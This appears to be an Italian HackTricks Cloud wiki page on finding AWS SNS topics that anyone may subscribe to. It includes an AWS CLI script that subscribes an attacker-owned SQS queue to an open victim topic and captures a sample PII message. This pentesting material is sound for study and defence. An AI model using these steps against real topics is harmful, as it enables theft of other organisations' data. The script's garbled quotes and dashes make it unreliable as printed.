HackTricks CloudAWS - SNS Unauthenticated Enum
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al đŹ gruppo Discord o al gruppo telegram o seguici su Twitter đŚ @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
SNS
Per maggiori informazioni su SNS consulta:
Aperto a tutti
Quando configuri un topic SNS dalla web console, è possibile indicare che Everyone can publish and subscribe al topic:
.png)
Quindi, se trovi lâARN dei topic allâinterno dellâaccount (o effettuando brute forcing sui possibili nomi dei topic), puoi verificare se puoi publish o subscribe a them.
Questo equivale a una resource policy di un topic SNS che autorizza sns:Subscribe a * (o ad account esterni): qualsiasi principal può creare una subscription che consegna tutti i futuri messaggi del topic a una SQS queue di cui è proprietario. Quando il proprietario della queue avvia la subscription, non è richiesta alcuna conferma umana per gli SQS endpoints.
Riproduzione (us-east-1)
```bash REGION=us-east-1 # Victim account (topic owner) VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âOpenSubscribeâ,âEffectâ:âAllowâ,âPrincipalâ:â*â,âActionâ:âsns:Subscribeâ,âResourceâ:â$VICTIM_TOPIC_ARNâ}]} JSON aws sns set-topic-attributes âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âattribute-name Policy âattribute-value file:///tmp/topic-policy.json
Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue âqueue-name attacker-exfil-queue-$(date +%s) âregion $REGION âquery QueueUrl âoutput text) ATTACKER_Q_ARN=$(aws sqs get-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattribute-names QueueArn âquery Attributes.QueueArn âoutput text)
Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âAllowVictimTopicSendâ,âEffectâ:âAllowâ,âPrincipalâ:{âServiceâ:âsns.amazonaws.comâ},âActionâ:âsqs:SendMessageâ,âResourceâ:â$ATTACKER_Q_ARNâ,âConditionâ:{âArnEqualsâ:{âaws:SourceArnâ:â$VICTIM_TOPIC_ARNâ}}}]} JSON aws sqs set-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattributes Policy=â$(cat /tmp/sqs-policy.json)â
Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âprotocol sqs ânotification-endpoint â$ATTACKER_Q_ARNâ âquery SubscriptionArn âoutput text)
Validation: publish and receive
aws sns publish âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âmessage {pii:ssn:123-45-6789} aws sqs receive-message âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âmax-number-of-messages 1 âwait-time-seconds 10 âquery Messages[0].Body âoutput text
</details>
> [!TIP]
> Impara e pratica il hacking AWS:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Impara e pratica il hacking GCP: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Impara e pratica il hacking Azure: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Supporta HackTricks</summary>
>
> - Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
> - **Unisciti al** đŹ [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** đŚ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
>
> </details>